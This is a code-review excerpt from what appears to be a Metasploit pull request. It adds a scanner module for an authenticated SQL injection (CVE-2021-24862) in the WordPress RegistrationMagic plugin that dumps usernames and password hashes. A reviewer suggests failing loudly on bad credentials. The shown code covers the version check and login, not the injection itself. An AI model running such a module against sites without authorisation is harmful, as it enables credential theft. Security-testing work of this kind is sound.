modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb

```diff
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress RegistrationMagic task_ids Authenticated SQLi',
+        'Description' => %q{
+          RegistrationMagic, a WordPress plugin,
+          prior to 5.0.1.5 is affected by an authenticated SQL injection via the
+          task_ids parameter.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-24862'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md'],
+          ['EDB', '50686'],
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2022-01-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'Valid Username for login', '']),
+      OptString.new('PASSWORD', [true, 'Valid Password for login', ''])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '5.0.1.6')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('RegistrationMagic version not vulnerable')
+      return
+    end
+    print_good('Vulnerable version of RegistrationMagic detected')
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
```

Comment:
This is kind of important. If the credentials aren't set, the module just exits quietly.

```suggestion
    fail_with(Failure::NoAccess, 'Invalid login, check credentials') if cookie.nil?
      
```